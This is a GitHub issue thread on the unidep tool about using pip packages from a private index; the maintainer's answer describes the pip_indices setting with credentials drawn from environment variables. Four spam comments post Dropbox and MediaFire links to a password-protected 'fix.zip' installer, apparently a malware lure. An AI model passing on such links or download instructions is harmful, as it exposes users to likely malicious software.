### ISSUE TITLE
How to handle pip deps from a private source?

### ISSUE THREAD

**Issue by anabiman** [basnijholt/unidep#187]
I am currently using poetry to pull python pkgs from a private index (see section of my pyproject.toml file below).
```toml
[[tool.poetry.source]]
name = "private-channel"
url = "utl-private-index"
priority = "explicit"

[tool.poetry.dev-dependencies]
pip_pkg = {version = ">=x.x.x", source ="private-channel"
```
I configure poetry with a private access token so it can have access to the private channel. How can I do something similar with unidep?

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by basnijholt** [comment]
Currently, unidep only supports `setuptools` and `hatchling`, and you can use their respective features to access packages from a private channel.

Poetry unfortunately, is not as flexible wrt plugins and therefore cannot be integrated easily. I started working on this in https://github.com/basnijholt/unidep/pull/78, however, ran into a couple of hard blockers.

**Comment by basnijholt** [comment]
Good news: this is now supported via the `pip_indices` field, added in [v3.1.0](https://github.com/conda-incubator/unidep/releases/tag/v3.1.0) (#257, #258).

You can specify private indices in your `requirements.yaml` or `pyproject.toml`, with credentials provided through environment variables:

```yaml
# requirements.yaml
pip_indices:
  - https://${PRIVATE_USER}:${PRIVATE_TOKEN}@private-index.company.com/simple/
```

or

```toml
# pyproject.toml
[tool.unidep]
pip_indices = [
    "https://${PRIVATE_USER}:${PRIVATE_TOKEN}@private-index.company.com/simple/",
]
```

How it works:

- The first URL becomes `--index-url`, any additional ones become `--extra-index-url`
- Environment variables like `${PRIVATE_TOKEN}` are expanded at install time, so no secrets end up in your config files
- Works with `unidep install` (both `pip` and `uv`), and generated `environment.yaml` files include the indices as `pip-repositories`

See the [Custom Pip Index URLs](https://github.com/conda-incubator/unidep#custom-pip-index-urls) section of the README for full details.

This is the unidep-native equivalent of Poetry's `[[tool.poetry.source]]` + token setup. Note that unidep still doesn't integrate with Poetry as a build backend (see #78 for the blockers there), but if you're using unidep's own workflow this should cover your use case.

Closing as resolved. Feel free to reopen if this doesn't work for your setup!
